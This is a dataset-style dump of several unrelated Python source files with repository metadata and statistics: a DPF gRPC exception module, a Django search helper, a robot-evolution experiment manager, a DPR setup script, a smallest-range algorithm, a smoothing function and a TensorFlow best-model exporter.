75ca8a180454f94cedafbc68c1d6f20dcfc4c795
|
[
"MIT"
] | 3
|
2021-06-30T07:18:30.000Z
|
2021-09-15T08:43:11.000Z
|
from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
from functools import wraps
_COMPLEX_PLOTTING_ERROR_MSG = """
Complex fields cannot be plotted. Use operators to get the amplitude
or the result at a defined sweeping phase before plotting.
"""
_FIELD_CONTAINER_PLOTTING_MSG = """"
This fields_container contains multiple fields. Only one time-step
result can be plotted at a time. Extract a field with
``fields_container[index]``.
"""
class DpfVersionNotSupported(RuntimeError):
"""Error raised when the dpf-core/grpc-dpf python features are not
supported by the DPF gRPC server version."""
def __init__(self, version, msg=None):
if msg is None:
msg = "Feature not supported. Upgrade the server to "
msg += str(version)
msg += " version (or above)."
RuntimeError.__init__(self, msg)
class DpfValueError(ValueError):
"""Error raised when a specific DPF error value must be defined."""
def __init__(
self, msg="A value that has been set leads to incorrect DPF behavior."
):
ValueError.__init__(self, msg)
class InvalidTypeError(ValueError):
"""Error raised when a parameter has the wrong type."""
def __init__(self, data_type, parameter_name):
msg = (
"A "
+ data_type
+ " must be used for the following parameter: "
+ parameter_name
+ "."
)
ValueError.__init__(self, msg)
class LocationError(ValueError):
"""Error raised when using an invalid location."""
def __init__(self, msg="Invalid location"):
ValueError.__init__(self, msg)
class ComplexPlottingError(ValueError):
"""Error raised when attempting to plot a field with complex data."""
def __init__(self, msg=_COMPLEX_PLOTTING_ERROR_MSG):
ValueError.__init__(self, msg)
class FieldContainerPlottingError(ValueError):
"""Error raised when attempting to plot a fields_container containing
multiple fields."""
def __init__(self, msg=_FIELD_CONTAINER_PLOTTING_MSG):
ValueError.__init__(self, msg)
class InvalidANSYSVersionError(RuntimeError):
"""Error raised when the Ansys verion is invalid."""
def __init__(self, msg=""):
RuntimeError.__init__(self, msg)
class DPFServerException(Exception):
"""Error raised when the DPF server has encountered an error."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class DPFServerNullObject(Exception):
"""Error raised when the DPF server cannot find an object."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class InvalidPortError(OSError):
"""Error raised when used an invalid port when starting DPF."""
def __init__(self, msg=""):
OSError.__init__(self, msg)
def protect_grpc(func):
"""Capture gRPC exceptions and return a more succinct error message."""
@wraps(func)
def wrapper(*args, **kwargs):
"""Capture gRPC exceptions."""
# Capture gRPC exceptions
try:
out = func(*args, **kwargs)
except (_InactiveRpcError, _MultiThreadedRendezvous) as error:
details = error.details()
if "object is null in the dataBase" in details:
raise DPFServerNullObject(details) from None
raise DPFServerException(details) from None
return out
return wrapper
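# --- Illustrative sketch (not part of the original module) ---
# protect_grpc can wrap any gRPC-facing callable; the builtin abs() stands in for
# such a call here. A gRPC failure inside the wrapped call would surface as
# DPFServerException (or DPFServerNullObject for null-object errors).
_safe_abs = protect_grpc(abs)
assert _safe_abs(-3) == 3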
| 28.882353
| 78
| 0.672971
| 400
| 3,437
| 5.51
| 0.3325
| 0.072595
| 0.089837
| 0.065336
| 0.245463
| 0.132486
| 0.106171
| 0.073503
| 0.03539
| 0
| 0
| 0
| 0.234507
| 3,437
| 118
| 79
| 29.127119
| 0.837704
| 0.21705
| 0
| 0.227273
| 0
| 0
| 0.18955
| 0.010679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.030303
| 0
| 0.393939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136d5996f3e902f896a0d95201a3a98051d0cce2
| 1,553
|
py
|
Python
|
apart/search.py
|
ruslan-ok/ServerApps
|
541aa12f1933054a12f590ce78544178be374669
|
[
"MIT"
] | 1
|
2021-06-07T02:14:13.000Z
|
2021-06-07T02:14:13.000Z
|
apart/search.py
|
ruslan-ok/ServerApps
|
541aa12f1933054a12f590ce78544178be374669
|
[
"MIT"
] | 9
|
2021-08-14T07:53:47.000Z
|
2022-03-18T19:07:22.000Z
|
apart/search.py
|
ruslan-ok/ServerApps
|
541aa12f1933054a12f590ce78544178be374669
|
[
"MIT"
] | null | null | null |
from django.db.models import Q
from hier.search import SearchResult
from .models import app_name, Apart, Meter, Bill, Service, Price
def search(user, query):
result = SearchResult(query)
lookups = Q(name__icontains=query) | Q(addr__icontains=query)
items = Apart.objects.filter(user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'apart', item.id, None, item.name, item.addr, False)
lookups = Q(info__icontains=query)
items = Meter.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'meter', item.id, item.reading.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y'))
lookups = Q(info__icontains=query) | Q(url__icontains=query)
items = Bill.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'bill', item.id, item.payment.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y'))
lookups = Q(name__icontains=query) | Q(abbr__icontains=query)
items = Service.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'service', item.id, None, item.name, item.abbr, False, item.apart.name)
lookups = Q(info__icontains=query)
items = Price.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'price', item.id, item.start, item.name(), item.info, False, item.apart.name)
return result.items
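# Illustrative note (not part of the original module): each lookup above is plain
# django.db.models.Q algebra, e.g. Q(name__icontains=query) | Q(addr__icontains=query)
# matches rows whose name OR address contains the query string, case-insensitively.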
| 45.676471
| 146
| 0.696072
| 229
| 1,553
| 4.58952
| 0.196507
| 0.106565
| 0.09039
| 0.076118
| 0.640343
| 0.623216
| 0.478592
| 0.478592
| 0.446242
| 0.446242
| 0
| 0
| 0.161623
| 1,553
| 33
| 147
| 47.060606
| 0.80722
| 0
| 0
| 0.269231
| 0
| 0
| 0.023181
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136df33d64bf85a2b5e33607c10d78558114c0b0
| 5,884
|
py
|
Python
|
pyrevolve/experiment_management.py
|
MRebolle/Battery-Robot
|
1b97e8c77cf7eff7d5cc7e417b4e5ec97e4011e7
|
[
"Apache-1.1"
] | null | null | null |
pyrevolve/experiment_management.py
|
MRebolle/Battery-Robot
|
1b97e8c77cf7eff7d5cc7e417b4e5ec97e4011e7
|
[
"Apache-1.1"
] | null | null | null |
pyrevolve/experiment_management.py
|
MRebolle/Battery-Robot
|
1b97e8c77cf7eff7d5cc7e417b4e5ec97e4011e7
|
[
"Apache-1.1"
] | null | null | null |
import os
import shutil
import numpy as np
from pyrevolve.custom_logging.logger import logger
import sys
class ExperimentManagement:
# robot ids in the names of all file types are always phenotype ids; the standard id format is 'robot_ID'
def __init__(self, settings):
self.settings = settings
manager_folder = os.path.dirname(self.settings.manager)
self._experiment_folder = os.path.join(manager_folder, 'data', self.settings.experiment_name, self.settings.run)
self._data_folder = os.path.join(self._experiment_folder, 'data_fullevolution')
self._gen_num = 0
def create_exp_folders(self):
if os.path.exists(self.experiment_folder):
shutil.rmtree(self.experiment_folder)
os.makedirs(self.experiment_folder)
os.mkdir(self.data_folder)
folders = ['genotypes', 'phenotypes', 'descriptors', 'objectives', 'fitness',
'battery', 'phenotype_images', 'failed_eval_robots']
for folder in folders:
os.mkdir(os.path.join(self.data_folder, folder))
@property
def experiment_folder(self):
return self._experiment_folder
@property
def data_folder(self):
return self._data_folder
def export_genotype(self, individual):
if self.settings.recovery_enabled:
individual.export_genotype(self.data_folder)
def export_phenotype(self, individual):
if self.settings.export_phenotype:
individual.export_phenotype(self.data_folder)
def export_fitnesses(self, individuals):
folder = self.data_folder
for individual in individuals:
individual.export_fitness(folder)
def export_fitness(self, individual):
folder = os.path.join(self.data_folder, 'fitness')
individual.export_fitness(folder)
def export_objectives(self, individual):
folder = os.path.join(self.data_folder, 'objectives')
individual.export_objectives(folder)
def export_battery(self, individual):
folder = os.path.join(self.data_folder, 'battery')
individual.export_battery(folder)
def export_behavior_measures(self, _id, measures):
filename = os.path.join(self.data_folder, 'descriptors', f'behavior_desc_{_id}.txt')
with open(filename, "w") as f:
if measures is None:
f.write(str(None))
else:
for key, val in measures.items():
f.write(f"{key} {val}\n")
def export_phenotype_images(self, dirpath, individual):
individual.phenotype.render_body(os.path.join(self.experiment_folder, dirpath, f'body_{individual.phenotype.id}.png'))
individual.phenotype.render_brain(os.path.join(self.experiment_folder, dirpath, f'brain_{individual.phenotype.id}.png'))
def export_failed_eval_robot(self, individual):
individual.genotype.export_genotype(os.path.join(self.data_folder, 'failed_eval_robots', f'genotype_{individual.phenotype.id}.txt'))
individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.yaml'))
individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.sdf'), conf_type='sdf')
def export_snapshots(self, individuals, gen_num):
self._gen_num = gen_num
if self.settings.recovery_enabled:
path = os.path.join(self.experiment_folder, f'selectedpop_{gen_num}')
if os.path.exists(path):
shutil.rmtree(path)
os.mkdir(path)
for ind in individuals:
self.export_phenotype_images(f'selectedpop_{str(gen_num)}', ind)
logger.info(f'Exported snapshot {str(gen_num)} with {str(len(individuals))} individuals')
def experiment_is_new(self):
if not os.path.exists(self.experiment_folder):
return True
path, dirs, files = next(os.walk(os.path.join(self.data_folder, 'fitness')))
if len(files) == 0:
return True
else:
return False
def read_recovery_state(self, population_size, offspring_size):
snapshots = []
for r, d, f in os.walk(self.experiment_folder):
for dir in d:
if 'selectedpop' in dir:
exported_files = len([name for name in os.listdir(os.path.join(self.experiment_folder, dir)) if os.path.isfile(os.path.join(self.experiment_folder, dir, name))])
if exported_files == (population_size * 2): # body and brain files
snapshots.append(int(dir.split('_')[1]))
if len(snapshots) > 0:
# the latest complete snapshot
last_snapshot = np.sort(snapshots)[-1]
# number of robots expected until the snapshot
n_robots = population_size + last_snapshot * offspring_size
else:
last_snapshot = -1
n_robots = 0
robot_ids = []
for r, d, f in os.walk(os.path.join(self.data_folder, 'fitness')):
for file in f:
robot_ids.append(int(file.split('.')[0].split('_')[-1]))
last_id = np.sort(robot_ids)[-1]
# if there are more robots to recover than the number expected in this snapshot
if last_id > n_robots:
# then recover also this partial offspring
has_offspring = True
else:
has_offspring = False
return last_snapshot, has_offspring, last_id+1
def plot_path(self, data_source: str, filename: str, file_extension=".png"):
data_folder = os.path.join(self._data_folder, data_source)
if not os.path.exists(data_folder):
os.mkdir(data_folder)
return os.path.join(data_folder, filename + str(self._gen_num) + file_extension)
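# --- Illustrative sketch (not part of the original module) ---
# The recovery arithmetic used in read_recovery_state, with hypothetical sizes:
# after snapshot 3 of a run with population 100 and offspring 50 per generation,
# 100 + 3 * 50 = 250 robots are expected to have been evaluated.
_population_size, _offspring_size, _last_snapshot = 100, 50, 3
assert _population_size + _last_snapshot * _offspring_size == 250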
| 41.730496
| 181
| 0.653977
| 746
| 5,884
| 4.957105
| 0.202413
| 0.040562
| 0.051379
| 0.064359
| 0.296647
| 0.244997
| 0.174148
| 0.140346
| 0.119794
| 0.064089
| 0
| 0.002688
| 0.241332
| 5,884
| 140
| 182
| 42.028571
| 0.825717
| 0.055235
| 0
| 0.111111
| 0
| 0
| 0.103927
| 0.050252
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157407
| false
| 0
| 0.046296
| 0.018519
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136f314f36b3d7d707a24bb2dc1a76fc985f86a7
| 1,079
|
py
|
Python
|
DPR/setup.py
|
sophiaalthammer/parm
|
ecf2dce5ee225b18e1ed3736a86696cc81e0797c
|
[
"MIT"
] | 18
|
2022-01-06T13:03:40.000Z
|
2022-03-29T14:24:23.000Z
|
DPR/setup.py
|
k-for-code/parm
|
ecf2dce5ee225b18e1ed3736a86696cc81e0797c
|
[
"MIT"
] | 1
|
2022-01-20T08:45:19.000Z
|
2022-01-24T05:18:40.000Z
|
DPR/setup.py
|
k-for-code/parm
|
ecf2dce5ee225b18e1ed3736a86696cc81e0797c
|
[
"MIT"
] | 4
|
2021-05-27T08:33:18.000Z
|
2022-02-20T17:45:40.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from setuptools import setup
with open("README.md") as f:
readme = f.read()
setup(
name="dpr",
version="0.1.0",
description="Facebook AI Research Open Domain Q&A Toolkit",
url="https://github.com/facebookresearch/DPR/",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
long_description=readme,
long_description_content_type="text/markdown",
setup_requires=[
"setuptools>=18.0",
],
install_requires=[
"cython",
"faiss-cpu>=1.6.1",
"filelock",
"numpy",
"regex",
"torch>=1.2.0",
"transformers>=3.0.0,<3.1.0",
"tqdm>=4.27",
"wget",
"spacy>=2.1.8",
],
)
| 25.690476
| 69
| 0.594995
| 132
| 1,079
| 4.818182
| 0.712121
| 0.031447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033624
| 0.255792
| 1,079
| 41
| 70
| 26.317073
| 0.758406
| 0.176089
| 0
| 0.09375
| 0
| 0
| 0.457014
| 0.054299
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03125
| 0
| 0.03125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
136f33f06908f09a707c44642cdf5eac1e23e341
| 2,817
|
py
|
Python
|
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py
|
BillionsRichard/pycharmWorkspace
|
709e2681fc6d85ff52fb25717215a365f51073aa
|
[
"Apache-2.0"
] | null | null | null |
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py
|
BillionsRichard/pycharmWorkspace
|
709e2681fc6d85ff52fb25717215a365f51073aa
|
[
"Apache-2.0"
] | null | null | null |
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py
|
BillionsRichard/pycharmWorkspace
|
709e2681fc6d85ff52fb25717215a365f51073aa
|
[
"Apache-2.0"
] | null | null | null |
# encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: billions.richard@qq.com
@site:
@software: PyCharm
@time: 2019/9/12 20:37
"""
from pprint import pprint as pp
from operator import itemgetter
import time
from collections import OrderedDict
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_85
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_86
class Solution:
"""
Input: [[4,10,15,24,26], [0,9,12,20], [5,18,22,30]]
Output: [20,24]
"""
def smallestRange(self, nums):
start_time = time.time()
k = len(nums)
print('k-->', k)
k_tagged_merged_list = []
for i in range(k):
row = nums[i]
k_tagged_merged_list.extend([(e, i) for e in row])
k_tagged_merged_list.sort(key=itemgetter(0))
sort_end_time = time.time()
print('sorting time:', sort_end_time - start_time)
# print(k_tagged_merged_list)
od = OrderedDict()
min_range = None
min_range_len = int(2e5)
# print('min_range_len', min_range_len)
tot_len = len(k_tagged_merged_list)
# print('tot_len', tot_len)
i = 0
while i < tot_len:
this_tag = k_tagged_merged_list[i][1]
cur_tag_set = od.keys()
if this_tag in cur_tag_set:
od.pop(this_tag)
od[this_tag] = k_tagged_merged_list[i][0]
tags = od.keys()
# print('len_k_dque-->', len(k_dque))
# print('len_k_dque_tags-->', len(k_dque_tags))
if len(tags) == k:
keys = list(od.keys())
first_v = od[keys[0]]
last_v = od[keys[-1]]
k_range_len = last_v - first_v
if k_range_len < min_range_len:
min_range_len = k_range_len
min_range = first_v, last_v
i += 1
print('ending main time:', time.time() - sort_end_time)
return min_range
if __name__ == '__main__':
s = Solution()
nums = [[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]
# nums = [[10], [11]]
# nums = [[11,38,83,
# 84,84,85,88,89,89,92],[28,61,89],[52,77,79,80,81],[21,25,26,26,26,27],[9,83,85,90],[84,85,87],[26,68,70,71],[36,40,41,42,45],[-34,21],[-28,-28,-23,1,13,21,28,37,37,38],[-74,1,2,22,33,35,43,45],[54,96,98,98,99],[43,54,60,65,71,75],[43,46],[50,50,58,67,69],[7,14,15],[78,80,89,89,90],[35,47,63,69,77,92,94]]
# [-74, 1, 2, 22, 33, 35, 43, 45], [54, 96, 98, 98, 99], [43, 54, 60, 65, 71, 75], [43, 46],
# [50, 50, 58, 67, 69], [7, 14, 15], [78, 80, 89, 89, 90], [35, 47, 63, 69, 77, 92, 94]]
nums = BIG_LIST_85
# nums = BIG_LIST_86
min_range = s.smallestRange(nums)
print(min_range)
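# --- Illustrative check (not part of the original script) ---
# The docstring example above: smallestRange returns the range as a tuple.
assert Solution().smallestRange([[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]) == (20, 24)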
| 31.651685
| 311
| 0.547746
| 465
| 2,817
| 3.107527
| 0.329032
| 0.055363
| 0.062976
| 0.082353
| 0.287889
| 0.269896
| 0.239446
| 0.204844
| 0.204844
| 0.204844
| 0
| 0.170455
| 0.281505
| 2,817
| 88
| 312
| 32.011364
| 0.543478
| 0.340078
| 0
| 0
| 0
| 0
| 0.023077
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021277
| false
| 0
| 0.12766
| 0
| 0.191489
| 0.106383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13700654033637b55b5386791b563e0e83f1b925
| 498
|
py
|
Python
|
cimcb/utils/smooth.py
|
CIMCB/cimcb
|
5d30f80423ed94e1068871b30e465b38d451581a
|
[
"MIT"
] | 5
|
2020-05-26T23:45:40.000Z
|
2022-01-13T00:40:14.000Z
|
cimcb/utils/smooth.py
|
CIMCB/cimcb
|
5d30f80423ed94e1068871b30e465b38d451581a
|
[
"MIT"
] | 3
|
2020-10-20T09:03:18.000Z
|
2021-11-01T14:22:05.000Z
|
cimcb/utils/smooth.py
|
KevinMMendez/cimcb
|
fe831253b122ed0ff9e33cbd160ef721abee1e38
|
[
"MIT"
] | 4
|
2020-10-12T07:17:43.000Z
|
2022-03-28T06:28:44.000Z
|
import numpy as np
def smooth(a, WSZ):
# a: NumPy 1-D array containing the data to be smoothed
# WSZ: smoothing window size; must be an odd number,
# as in the original MATLAB implementation
if WSZ % 2 == 0:
WSZ = WSZ - 1
out0 = np.convolve(a, np.ones(WSZ, dtype=int), 'valid') / WSZ
r = np.arange(1, WSZ - 1, 2)
start = np.cumsum(a[:WSZ - 1])[::2] / r
stop = (np.cumsum(a[:-WSZ:-1])[::2] / r)[::-1]
return np.concatenate((start, out0, stop))
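# --- Illustrative checks (not part of the original module) ---
# The output has the same length as the input, and a constant signal is unchanged.
assert smooth(np.arange(10.0), 5).shape == (10,)
assert np.allclose(smooth(np.ones(9), 3), np.ones(9))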
| 33.2
| 65
| 0.588353
| 83
| 498
| 3.53012
| 0.542169
| 0.054608
| 0.051195
| 0.081911
| 0.102389
| 0.102389
| 0.102389
| 0
| 0
| 0
| 0
| 0.037433
| 0.248996
| 498
| 14
| 66
| 35.571429
| 0.745989
| 0.309237
| 0
| 0
| 0
| 0
| 0.014706
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13710731fb3b914385bee296e01c654e62f3641b
| 11,810
|
py
|
Python
|
ezeeai/core/extensions/best_exporter.py
|
jmarine/ezeeai
|
091b4ce3bc5794c534084bff3301b15ba8a9be1a
|
[
"Apache-2.0"
] | 19
|
2019-06-12T03:14:59.000Z
|
2021-05-31T16:02:53.000Z
|
ezeeai/core/extensions/best_exporter.py
|
jmarine/ezeeai
|
091b4ce3bc5794c534084bff3301b15ba8a9be1a
|
[
"Apache-2.0"
] | 29
|
2019-06-27T10:15:38.000Z
|
2022-03-11T23:46:36.000Z
|
ezeeai/core/extensions/best_exporter.py
|
jmarine/ezeeai
|
091b4ce3bc5794c534084bff3301b15ba8a9be1a
|
[
"Apache-2.0"
] | 10
|
2019-05-14T17:45:44.000Z
|
2020-08-26T13:25:04.000Z
|
from __future__ import absolute_import
import abc
import os
import json
import glob
import shutil
from tensorflow.python.estimator import gc
from tensorflow.python.estimator import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.framework import errors_impl
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter
def _verify_compare_fn_args(compare_fn):
"""Verifies compare_fn arguments."""
args = set(util.fn_args(compare_fn))
if 'best_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include best_eval_result argument.' % compare_fn)
if 'current_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include current_eval_result argument.' %
compare_fn)
non_valid_args = list(args - set(['best_eval_result', 'current_eval_result']))
if non_valid_args:
raise ValueError('compare_fn (%s) has following not expected args: %s' %
(compare_fn, non_valid_args))
def _loss_smaller(best_eval_result, current_eval_result):
"""Compares two evaluation results and returns true if the 2nd one is smaller.
Both evaluation results should have the values for MetricKeys.LOSS, which are
used for comparison.
Args:
best_eval_result: best eval metrics.
current_eval_result: current eval metrics.
Returns:
True if the loss of current_eval_result is smaller; otherwise, False.
Raises:
ValueError: If input eval result is None or no loss is available.
"""
default_key = metric_keys.MetricKeys.LOSS
if not best_eval_result or default_key not in best_eval_result:
raise ValueError(
'best_eval_result cannot be empty or no loss is found in it.')
if not current_eval_result or default_key not in current_eval_result:
raise ValueError(
'current_eval_result cannot be empty or no loss is found in it.')
return best_eval_result[default_key] > current_eval_result[default_key]
class BestExporter(Exporter):
"""This class exports the serving graph and checkpoints of the best models.
This class performs a model export every time the new model is better
than any existing model.
"""
def __init__(self,
name='best_exporter',
serving_input_receiver_fn=None,
event_file_pattern='eval/*.tfevents.*',
compare_fn=_loss_smaller,
assets_extra=None,
as_text=False,
exports_to_keep=5):
"""Create an `Exporter` to use with `tf.estimator.EvalSpec`.
Example of creating a BestExporter for training and evaluation:
```python
def make_train_and_eval_fn():
# Set up feature columns.
categorial_feature_a = (
tf.feature_column.categorical_column_with_hash_bucket(...))
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = tf.estimator.DNNClassifier(
config=tf.estimator.RunConfig(
model_dir='/my_model', save_summary_steps=100),
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
serving_feature_spec = tf.feature_column.make_parse_example_spec(
categorial_feature_a_emb)
serving_input_receiver_fn = (
tf.estimator.export.build_parsing_serving_input_receiver_fn(
serving_feature_spec))
exporter = tf.estimator.BestExporter(
name="best_exporter",
serving_input_receiver_fn=serving_input_receiver_fn,
exports_to_keep=5)
train_spec = tf.estimator.TrainSpec(...)
eval_spec = [tf.estimator.EvalSpec(
input_fn=eval_input_fn,
steps=100,
exporters=exporter,
start_delay_secs=0,
throttle_secs=5)]
return tf.estimator.DistributedTrainingSpec(estimator, train_spec,
eval_spec)
```
Args:
name: unique name of this `Exporter` that is going to be used in the
export path.
serving_input_receiver_fn: a function that takes no arguments and returns
a `ServingInputReceiver`.
event_file_pattern: event file name pattern relative to model_dir. If
None, however, the exporter would not be preemption-safe. To be
preemption-safe, event_file_pattern should be specified.
compare_fn: a function that compares two evaluation results and returns
true if current evaluation result is better. Follows the signature:
* Args:
* `best_eval_result`: This is the evaluation result of the best model.
* `current_eval_result`: This is the evaluation result of current
candidate model.
* Returns:
True if current evaluation result is better; otherwise, False.
assets_extra: An optional dict specifying how to populate the assets.extra
directory within the exported SavedModel. Each key should give the
destination path (including the filename) relative to the assets.extra
directory. The corresponding value gives the full path of the source
file to be copied. For example, the simple case of copying a single
file without renaming it is specified as `{'my_asset_file.txt':
'/path/to/my_asset_file.txt'}`.
as_text: whether to write the SavedModel proto in text format. Defaults to
`False`.
exports_to_keep: Number of exports to keep. Older exports will be
garbage-collected. Defaults to 5. Set to `None` to disable garbage
collection.
Raises:
ValueError: if any arguments is invalid.
"""
self._compare_fn = compare_fn
if self._compare_fn is None:
raise ValueError('`compare_fn` must not be None.')
_verify_compare_fn_args(self._compare_fn)
self._saved_model_exporter = _SavedModelExporter(
name, serving_input_receiver_fn, assets_extra, as_text)
self._event_file_pattern = event_file_pattern
self._model_dir = None
self._best_eval_result = None
self._exports_to_keep = exports_to_keep
self._log = {}
if exports_to_keep is not None and exports_to_keep <= 0:
raise ValueError(
'`exports_to_keep`, if provided, must be positive number')
@property
def name(self):
return self._saved_model_exporter.name
def export(self, estimator, export_path, checkpoint_path, eval_result,
is_the_final_export):
export_result = None
if self._model_dir != estimator.model_dir and self._event_file_pattern:
# Loads best metric from event files.
tf_logging.info('Loading best metric from event files.')
self._model_dir = estimator.model_dir
full_event_file_pattern = os.path.join(self._model_dir,
self._event_file_pattern)
self._best_eval_result = self._get_best_eval_result(
full_event_file_pattern)
if os.path.isfile(os.path.join(export_path, 'export.log')):
self._log = {}
try:
with open(os.path.join(export_path, 'export.log'), 'r') as log_file:
self._log = json.load(log_file)
except json.JSONDecodeError:
pass
if len(self._log) == 0:
self._best_eval_result = None
if self._best_eval_result is None or self._compare_fn(
best_eval_result=self._best_eval_result,
current_eval_result=eval_result):
tf_logging.info('Performing best model export.')
self._best_eval_result = eval_result
export_result = self._saved_model_exporter.export(
estimator, export_path, checkpoint_path, eval_result,
is_the_final_export)
export_result_path = export_result.decode("utf-8")
self._log[export_result_path] = {k: float(v) for k, v in eval_result.items()}
self._copy_checkpoint(checkpoint_path, export_result_path, eval_result["global_step"])
self._garbage_collect_exports(export_path)
with open(os.path.join(export_path, 'export.log'), 'w') as fp:
json.dump(self._log, fp)
return export_result
def _copy_checkpoint(self, checkpoint_pattern, dest_path, step):
for file in glob.glob(checkpoint_pattern + '*'):
shutil.copy(file, dest_path)
with open(os.path.join(dest_path, 'checkpoint'), 'w') as fp:
text = 'model_checkpoint_path: "model.ckpt-{}"\n'.format(step)
fp.write(text)
def _garbage_collect_exports(self, export_dir_base):
"""Deletes older exports, retaining only a given number of the most recent.
Export subdirectories are assumed to be named with monotonically increasing
integers; the most recent are taken to be those with the largest values.
Args:
export_dir_base: the base directory under which each export is in a
versioned subdirectory.
"""
if self._exports_to_keep is None:
return
def _export_version_parser(path):
# create a simple parser that pulls the export_version from the directory.
filename = os.path.basename(path.path)
if not (len(filename) == 10 and filename.isdigit()):
return None
return path._replace(export_version=int(filename))
# pylint: disable=protected-access
keep_filter = gc._largest_export_versions(self._exports_to_keep)
delete_filter = gc._negation(keep_filter)
for p in delete_filter(
gc._get_paths(export_dir_base, parser=_export_version_parser)):
try:
del self._log[p.path]
gfile.DeleteRecursively(p.path)
except errors_impl.NotFoundError as e:
tf_logging.warn('Can not delete %s recursively: %s', p.path, e)
# pylint: enable=protected-access
def _get_best_eval_result(self, event_files):
"""Get the best eval result from event files.
Args:
event_files: Absolute pattern of event files.
Returns:
The best eval result.
"""
if not event_files:
return None
event_count = 0
best_eval_result = None
for event_file in gfile.Glob(os.path.join(event_files)):
for event in summary_iterator.summary_iterator(event_file):
if event.HasField('summary'):
event_eval_result = {}
for value in event.summary.value:
if value.HasField('simple_value'):
event_eval_result[value.tag] = value.simple_value
if event_eval_result:
if best_eval_result is None or self._compare_fn(
best_eval_result, event_eval_result):
event_count += 1
best_eval_result = event_eval_result
if event_count < 2:
return None
return best_eval_result
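# The `compare_fn` contract described in the constructor docstring is easy to
# satisfy with a custom metric. The sketch below prefers the candidate with the
# larger 'accuracy' value; the metric key is an assumption for illustration,
# not something this class requires.
def _accuracy_larger(best_eval_result, current_eval_result):
  """Returns True if the current eval result has a larger 'accuracy' metric."""
  metric_key = 'accuracy'
  if not best_eval_result or metric_key not in best_eval_result:
    raise ValueError(
        'best_eval_result cannot be empty or missing %s.' % metric_key)
  if not current_eval_result or metric_key not in current_eval_result:
    raise ValueError(
        'current_eval_result cannot be empty or missing %s.' % metric_key)
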